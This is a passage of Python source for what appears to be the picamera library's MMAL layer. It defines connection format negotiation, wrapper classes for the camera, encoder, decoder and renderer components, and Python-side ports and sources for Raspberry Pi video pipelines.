def copy_format():
self._source.commit()
self._target.copy_from(self._source)
self._target.commit()
def max_buffers():
self._source.buffer_count = self._target.buffer_count = max(
self._source.buffer_count, self._target.buffer_count)
self._source.buffer_size = self._target.buffer_size = max(
self._source.buffer_size, self._target.buffer_size)
# Filter out formats that aren't supported on both source and target
# ports. This is a little tricky as ports that support OPAQUE never
# claim they do (so we have to assume it's mutually supported)
mutually_supported = (
set(self._source.supported_formats) &
set(self._target.supported_formats)
) | {mmal.MMAL_ENCODING_OPAQUE}
formats = [f for f in formats if f in mutually_supported]
if formats:
# If there are any formats left to try, perform the negotiation
# with the filtered list. Again, there's some special casing to
# deal with the incompatible OPAQUE sub-formats
for f in formats:
if f == mmal.MMAL_ENCODING_OPAQUE:
if (self._source.opaque_subformat,
self._target.opaque_subformat) in self.compatible_opaque_formats:
self._source.format = mmal.MMAL_ENCODING_OPAQUE
else:
continue
else:
self._source.format = f
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
continue
else:
max_buffers()
return
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to negotiate port format')
else:
# If no formats are available to try (either from filtering or
# because none were given), assume the source port is set up
# properly. Just copy the format to the target and hope the caller
# knows what they're doing
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to copy source format to target port')
else:
max_buffers()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
@property
def source(self):
"""
The source :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._source
@property
def target(self):
"""
The target :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._target
class MMALConnection(MMALBaseConnection):
"""
Represents an MMAL internal connection between two components. The
constructor accepts arguments providing the *source* :class:`MMALPort` and
*target* :class:`MMALPort`.
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
.. note::
The default *formats* list starts with OPAQUE; the class understands
the different OPAQUE sub-formats (see :ref:`mmal` for more information)
and will only select OPAQUE if compatible sub-formats can be used on
both ports.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALConnection` object
sending the data, and the :class:`MMALBuffer` object containing data. The
callable may optionally manipulate the :class:`MMALBuffer` and return it
to permit it to continue traversing the connection, or return ``None``
in which case the buffer will be released.
.. note::
There is a significant performance penalty for specifying a
callback between MMAL components as it requires buffers to be
copied from the GPU's memory to the CPU's memory and back again.
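    For example, a hypothetical connection which counts the buffers passing
    from a splitter to an encoder (*splitter* and *encoder* are illustrative
    names)::
        def counter(connection, buf):
            counter.frames += 1
            return buf  # return the buffer so it continues to the target
        counter.frames = 0
        conn = MMALConnection(
            splitter.outputs[1], encoder.inputs[0], callback=counter)
        conn.enable()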
.. data:: default_formats
:annotation: = (MMAL_ENCODING_OPAQUE, MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
connections between MMAL components.
"""
__slots__ = ('_connection', '_callback', '_wrapper')
default_formats = (
mmal.MMAL_ENCODING_OPAQUE,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not isinstance(source, MMALPort):
raise PiCameraValueError('source is not an MMAL port')
if not isinstance(target, MMALPort):
raise PiCameraValueError('target is not an MMAL port')
super(MMALConnection, self).__init__(source, target, formats)
self._connection = ct.POINTER(mmal.MMAL_CONNECTION_T)()
self._callback = callback
flags = mmal.MMAL_CONNECTION_FLAG_ALLOCATION_ON_INPUT
if callback is None:
flags |= mmal.MMAL_CONNECTION_FLAG_TUNNELLING
try:
mmal_check(
mmal.mmal_connection_create(
self._connection, source._port, target._port, flags),
prefix="Failed to create connection")
except:
self._connection = None
raise
def close(self):
if self._connection is not None:
mmal.mmal_connection_destroy(self._connection)
self._connection = None
self._wrapper = None
super(MMALConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return bool(self._connection[0].is_enabled)
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
def wrapper(connection):
buf = mmal.mmal_queue_get(connection[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
modified_buf = self._callback(self, buf)
except:
buf.release()
raise
else:
if modified_buf is not None:
try:
self._target.send_buffer(modified_buf)
except PiCameraPortDisabled:
# Target port disabled; ignore the error
pass
else:
buf.release()
return
buf = mmal.mmal_queue_get(connection[0].pool[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
self._source.send_buffer(buf)
except PiCameraPortDisabled:
# Source port has been disabled; ignore the error
pass
if self._callback is not None:
self._wrapper = mmal.MMAL_CONNECTION_CALLBACK_T(wrapper)
self._connection[0].callback = self._wrapper
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
mmal_check(
mmal.mmal_connection_enable(self._connection),
prefix="Failed to enable connection")
if self._callback is not None:
MMALPool(self._connection[0].pool).send_all_buffers(self._source)
def disable(self):
"""
Disables the connection.
"""
mmal_check(
mmal.mmal_connection_disable(self._connection),
prefix="Failed to disable connection")
self._wrapper = None
@property
def name(self):
return self._connection[0].name.decode('ascii')
def __repr__(self):
if self._connection is not None:
return '<MMALConnection "%s">' % self.name
else:
return '<MMALConnection closed>'
class MMALRawCamera(MMALBaseComponent):
"""
The MMAL "raw camera" component.
Don't use this! If you insist on using this anyway, read the forum post
about `raw sensor access`_ first.
    .. _raw sensor access: https://www.raspberrypi.org/forums/viewtopic.php?f=43&t=109137
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_RAW_CAMERA
opaque_input_subformats = ()
opaque_output_subformats = ('OPQV-single',)
class MMALCamera(MMALBaseComponent):
"""
Represents the MMAL camera component. This component has 0 input ports and
3 output ports. The intended use of the output ports (which in turn
determines the behaviour of those ports) is as follows:
* Port 0 is intended for preview renderers
* Port 1 is intended for video recording
* Port 2 is intended for still image capture
Use the ``MMAL_PARAMETER_CAMERA_CONFIG`` parameter on the control port to
obtain and manipulate the camera's configuration.
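    A minimal sketch connecting the preview port to a renderer (this assumes a
    camera module is attached and omits any format configuration)::
        camera = MMALCamera()
        preview = MMALRenderer()
        preview.connect(camera.outputs[0])
        preview.enable()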
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA
opaque_output_subformats = ('OPQV-single', 'OPQV-dual', 'OPQV-strips')
annotate_structs = (
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V2_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V3_T,
)
def __init__(self):
global FIX_RGB_BGR_ORDER
super(MMALCamera, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] is None:
found = False
# try largest struct to smallest as later firmwares still happily
# accept earlier revision structures
# XXX do old firmwares reject too-large structs?
for struct in reversed(MMALCamera.annotate_structs):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = struct
self.control.params[mmal.MMAL_PARAMETER_ANNOTATE]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
if FIX_RGB_BGR_ORDER is None:
# old firmware lists BGR24 before RGB24 in supported_formats
for f in self.outputs[1].supported_formats:
if f == mmal.MMAL_ENCODING_BGR24:
FIX_RGB_BGR_ORDER = True
break
elif f == mmal.MMAL_ENCODING_RGB24:
FIX_RGB_BGR_ORDER = False
break
def _get_annotate_rev(self):
try:
return MMALCamera.annotate_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE]) + 1
        except ValueError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
def _set_annotate_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = MMALCamera.annotate_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera annotation structure revision")
annotate_rev = property(_get_annotate_rev, _set_annotate_rev, doc="""\
The annotation capabilities of the firmware have evolved over time and
several structures are available for querying and setting video
annotations. By default the :class:`MMALCamera` class will pick the
latest annotation structure supported by the current firmware but you
can select older revisions with :attr:`annotate_rev` for other purposes
(e.g. testing).
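        For example (illustrative only)::
            camera.annotate_rev = 2  # force the V2 annotation structure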
""")
class MMALCameraInfo(MMALBaseComponent):
"""
Represents the MMAL camera-info component. Query the
``MMAL_PARAMETER_CAMERA_INFO`` parameter on the control port to obtain
information about the connected camera module.
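    For example, a rough sketch (the exact fields available depend on the
    structure revision reported by the firmware)::
        info = MMALCameraInfo()
        mp = info.control.params[mmal.MMAL_PARAMETER_CAMERA_INFO]
        print(mp.num_cameras)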
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA_INFO
info_structs = (
mmal.MMAL_PARAMETER_CAMERA_INFO_T,
mmal.MMAL_PARAMETER_CAMERA_INFO_V2_T,
)
def __init__(self):
super(MMALCameraInfo, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] is None:
found = False
# try smallest structure to largest as later firmwares reject
# older structures
for struct in MMALCameraInfo.info_structs:
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = struct
self.control.params[mmal.MMAL_PARAMETER_CAMERA_INFO]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _get_info_rev(self):
try:
return MMALCameraInfo.info_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO]) + 1
        except ValueError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _set_info_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = MMALCameraInfo.info_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera info structure revision")
info_rev = property(_get_info_rev, _set_info_rev, doc="""\
The camera information capabilities of the firmware have evolved over
time and several structures are available for querying camera
information. When initialized, :class:`MMALCameraInfo` will attempt
to discover which structure is in use by the extant firmware. This
property can be used to discover the structure version and to modify
the version in use for other purposes (e.g. testing).
""")
class MMALComponent(MMALBaseComponent):
"""
Represents an MMAL component that acts as a filter of some sort, with a
    single input that connects to an upstream source port. This is an abstract
base class.
"""
__slots__ = ()
def __init__(self):
super(MMALComponent, self).__init__()
assert len(self.opaque_input_subformats) == 1
def close(self):
self.disconnect()
super(MMALComponent, self).close()
def enable(self):
super(MMALComponent, self).enable()
if self.connection is not None:
self.connection.enable()
def disable(self):
if self.connection is not None:
self.connection.disable()
super(MMALComponent, self).disable()
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
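        For example, a hypothetical pipeline fragment (*camera* is an
        illustrative, already-constructed :class:`MMALCamera`)::
            encoder = MMALImageEncoder()
            encoder.connect(camera)  # picks the camera's first free output
            encoder.enable()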
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
return self.inputs[0].connect(source)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
class MMALSplitter(MMALComponent):
"""
Represents the MMAL splitter component. This component has 1 input port
and 4 output ports which all generate duplicates of buffers passed to the
input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_SPLITTER
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = ('OPQV-single',) * 4
class MMALISPResizer(MMALComponent):
"""
Represents the MMAL ISP resizer component. This component has 1 input port
and 1 output port, and supports resizing via the VideoCore ISP, along with
conversion of numerous formats into numerous other formats (e.g. OPAQUE to
RGB, etc). This is more efficient than :class:`MMALResizer` but is only
available on later firmware versions.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_ISP
opaque_input_subformats = ('OPQV-single',)
    opaque_output_subformats = (None,)
class MMALResizer(MMALComponent):
"""
Represents the MMAL VPU resizer component. This component has 1 input port
and 1 output port. This supports resizing via the VPU. This is not as
efficient as :class:`MMALISPResizer` but is available on all firmware
    versions. The output port can (and usually should) have a different frame
size to the input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_RESIZER
opaque_input_subformats = (None,)
opaque_output_subformats = (None,)
class MMALEncoder(MMALComponent):
"""
Represents a generic MMAL encoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoEncoder(MMALEncoder):
"""
Represents the MMAL video encoder component. This component has 1 input
port and 1 output port. The output port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_ENCODER
opaque_input_subformats = ('OPQV-dual',)
opaque_output_subformats = (None,)
class MMALImageEncoder(MMALEncoder):
"""
Represents the MMAL image encoder component. This component has 1 input
port and 1 output port. The output port is typically configured with
``MMAL_ENCODING_JPEG`` but can also use ``MMAL_ENCODING_PNG``,
``MMAL_ENCODING_GIF``, etc.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_ENCODER
opaque_input_subformats = ('OPQV-strips',)
opaque_output_subformats = (None,)
class MMALDecoder(MMALComponent):
"""
Represents a generic MMAL decoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoDecoder(MMALDecoder):
"""
Represents the MMAL video decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALImageDecoder(MMALDecoder):
"""
    Represents the MMAL image decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_JPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALRenderer(MMALComponent):
"""
Represents the MMAL renderer component. This component has 1 input port and
0 output ports. It is used to implement the camera preview and overlays.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_RENDERER
opaque_input_subformats = ('OPQV-single',)
class MMALNullSink(MMALComponent):
"""
Represents the MMAL null-sink component. This component has 1 input port
and 0 output ports. It is used to keep the preview port "alive" (and thus
calculating white-balance and exposure) when the camera preview is not
required.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_NULL_SINK
opaque_input_subformats = ('OPQV-single',)
class MMALPythonPort(MMALObject):
"""
Implements ports for Python-based MMAL components.
"""
__slots__ = (
'_buffer_count',
'_buffer_size',
'_connection',
'_enabled',
'_owner',
'_pool',
'_type',
'_index',
'_supported_formats',
'_format',
'_callback',
)
_FORMAT_BPP = {
'I420': 1.5,
'RGB3': 3,
'RGBA': 4,
'BGR3': 3,
'BGRA': 4,
}
def __init__(self, owner, port_type, index):
self._buffer_count = 2
self._buffer_size = 0
self._connection = None
self._enabled = False
self._owner = weakref.ref(owner)
self._pool = None
self._callback = None
self._type = port_type
self._index = index
self._supported_formats = {
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
self._format = ct.pointer(mmal.MMAL_ES_FORMAT_T(
type=mmal.MMAL_ES_TYPE_VIDEO,
encoding=mmal.MMAL_ENCODING_I420,
es=ct.pointer(mmal.MMAL_ES_SPECIFIC_FORMAT_T())))
def close(self):
self.disconnect()
self.disable()
self._format = None
def __repr__(self):
return '<MMALPythonPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d frames=%s@%sfps>' % (
self.name, mmal.FOURCC_str(self.format), self.buffer_count,
self.buffer_size, self.framesize, self.framerate)
def _get_bitrate(self):
return self._format[0].bitrate
def _set_bitrate(self, value):
self._format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def _get_supported_formats(self):
return self._supported_formats
def _set_supported_formats(self, value):
try:
value = {f for f in value}
except TypeError:
value = {value}
if not value:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "port must have at least one valid format")
self._supported_formats = value
supported_formats = property(_get_supported_formats, _set_supported_formats, doc="""\
Retrieves or sets the set of valid formats for this port. The set must
always contain at least one valid format. A single format can be
specified; it will be converted implicitly to a singleton set.
If the current port :attr:`format` is not a member of the new set, no
error is raised. An error will be raised when :meth:`commit` is next
called if :attr:`format` is still not a member of the set.
""")
def _get_format(self):
return self._format[0].encoding
def _set_format(self, value):
self._format[0].encoding = value
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
""")
def _get_framesize(self):
return PiResolution(
self._format[0].es[0].video.crop.width,
self._format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = value.width
video.crop.height = value.height
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the source's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
""")
def _get_framerate(self):
video = self._format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
""")
@property
def pool(self):
"""
Returns the :class:`MMALPool` associated with the buffer, if any.
"""
return self._pool
@property
def opaque_subformat(self):
return None
def _get_buffer_count(self):
return self._buffer_count
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._buffer_count = int(value)
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port. The
default is 2 but more may be required in the case of long pipelines
with replicated buffers.
""")
def _get_buffer_size(self):
return self._buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers defaults to a value dictated by the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._format, source._format)
else:
mmal.mmal_format_copy(self._format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers. This is typically called after
adjusting the port's format and/or associated settings (like width and
height for video ports).
"""
if self.format not in self.supported_formats:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'invalid format for port %r' % self)
self._buffer_count = 2
video = self._format[0].es[0].video
try:
self._buffer_size = int(
MMALPythonPort._FORMAT_BPP[str(self.format)]
* video.width
* video.height)
except KeyError:
# If it's an unknown / encoded format just leave the buffer size
# alone and hope the owning component knows what to set
pass
self._owner()._commit_port(self)
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return self._enabled
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
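        For example, a rough sketch (*source* is assumed to be an unconnected
        output port belonging to a Python component)::
            def dump(port, buf):
                print(len(buf.data), 'bytes received')
            source.enable(dump)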
"""
if self._connection is not None:
if callback is not None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'connected ports must be enabled without callback')
else:
if callback is None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'unconnected ports must be enabled with callback')
if self.type == mmal.MMAL_PORT_TYPE_INPUT or self._connection is None:
self._pool = MMALPythonPortPool(self)
self._callback = callback
self._enabled = True
def disable(self):
"""
Disable the port.
"""
self._enabled = False
if self._pool is not None:
# Release any unprocessed buffers from the owner's queue before
# we destroy them all
while True:
buf = self._owner()._queue.get(False)
if buf:
buf.release()
else:
break
self._pool.close()
self._pool = None
self._callback = None
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self._enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
if self._pool is not None:
# Unconnected port or input port case; retrieve buffer from the
# allocated pool
return self._pool.get_buffer(block, timeout)
else:
# Connected output port case; get a buffer from the target input
# port (in this case the port is just a thin proxy for the
# corresponding input port)
assert self.type == mmal.MMAL_PORT_TYPE_OUTPUT
return self._connection.target.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
# NOTE: The MMALPythonConnection callback must occur *before* the test
# for the port being enabled; it's meant to be the connection making
# the callback prior to the buffer getting to the port after all
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
else:
buf = modified_buf
if not self._enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
        if self._callback is not None:
            try:
                # XXX Return value? If it's an input port we should ignore it,
                # but what about output ports?
                self._callback(self, buf)
except:
buf.release()
raise
if self._type == mmal.MMAL_PORT_TYPE_INPUT:
# Input port case; queue the buffer for processing on the
# owning component
self._owner()._queue.put(buf)
elif self._connection is None:
# Unconnected output port case; release the buffer back to the
# pool
buf.release()
else:
# Connected output port case; forward the buffer to the
# connected component's input port
# XXX If it's a format-change event?
self._connection.target.send_buffer(buf)
@property
def name(self):
return '%s:%s:%d' % (self._owner().name, {
mmal.MMAL_PORT_TYPE_OUTPUT: 'out',
mmal.MMAL_PORT_TYPE_INPUT: 'in',
mmal.MMAL_PORT_TYPE_CONTROL: 'control',
mmal.MMAL_PORT_TYPE_CLOCK: 'clock',
}[self.type], self._index)
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._index
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection options can be specified as keyword arguments. These
will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
return MMALPythonConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALPythonPortPool(MMALPool):
"""
Creates a pool of buffer headers for an :class:`MMALPythonPort`. This is
only used when a fake port is used without a corresponding
:class:`MMALPythonConnection`.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPythonPortPool, self).__init__(
mmal.mmal_pool_create(port.buffer_count, port.buffer_size))
self._port = port
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_all_buffers(port, block, timeout)
class MMALPythonBaseComponent(MMALObject):
"""
Base class for Python-implemented MMAL components. This class provides the
:meth:`_commit_port` method used by descendents to control their ports'
behaviour, and the :attr:`enabled` property. However, it is unlikely that
users will want to sub-class this directly. See
:class:`MMALPythonComponent` for a more useful starting point.
"""
__slots__ = ('_inputs', '_outputs', '_enabled',)
def __init__(self):
super(MMALPythonBaseComponent, self).__init__()
self._enabled = False
self._inputs = ()
self._outputs = ()
# TODO Control port?
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
self.disable()
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return self._enabled
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
self._enabled = True
def disable(self):
"""
Disables the component.
"""
self._enabled = False
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return None
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
def _commit_port(self, port):
"""
Called by ports when their format is committed. Descendents may
override this to reconfigure output ports when input ports are
committed, or to raise errors if the new port configuration is
unacceptable.
.. warning::
This method must *not* reconfigure input ports when called; however
it can reconfigure *output* ports when input ports are committed.
"""
pass
def __repr__(self):
if self._outputs:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALPythonSource(MMALPythonBaseComponent):
"""
Provides a source for other :class:`MMALComponent` instances. The
specified *input* is read in chunks the size of the configured output
buffer(s) until the input is exhausted. The :meth:`wait` method can be
used to block until this occurs. If the output buffer is configured to
use a full-frame unencoded format (like I420 or RGB), frame-end flags will
be automatically generated by the source. When the input is exhausted an
empty buffer with the End Of Stream (EOS) flag will be sent.
The component provides all picamera's usual IO-handling characteristics; if
*input* is a string, a file with that name will be opened as the input and
closed implicitly when the component is closed. Otherwise, the input will
not be closed implicitly (the component did not open it, so the assumption
is that closing *input* is the caller's responsibility). If *input* is an
object with a ``read`` method it is assumed to be a file-like object and is
used as is. Otherwise, *input* is assumed to be a readable object
supporting the buffer protocol (which is wrapped in a :class:`BufferIO`
stream).
"""
__slots__ = ('_stream', '_opened', '_thread')
def __init__(self, input):
super(MMALPythonSource, self).__init__()
self._inputs = ()
self._outputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, 0),)
self._stream, self._opened = open_stream(input, output=False)
self._thread = None
def close(self):
super(MMALPythonSource, self).close()
if self._outputs:
self._outputs[0].close()
self._outputs = ()
if self._stream:
close_stream(self._stream, self._opened)
self._stream = None
def enable(self):
super(MMALPythonSource, self).enable()
self._thread = Thread(target=self._send_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonSource, self).disable()
if self._thread:
self._thread.join()
self._thread = None
def wait(self, timeout=None):
"""
Wait for the source to send all bytes from the specified input. If
*timeout* is specified, it is the number of seconds to wait for
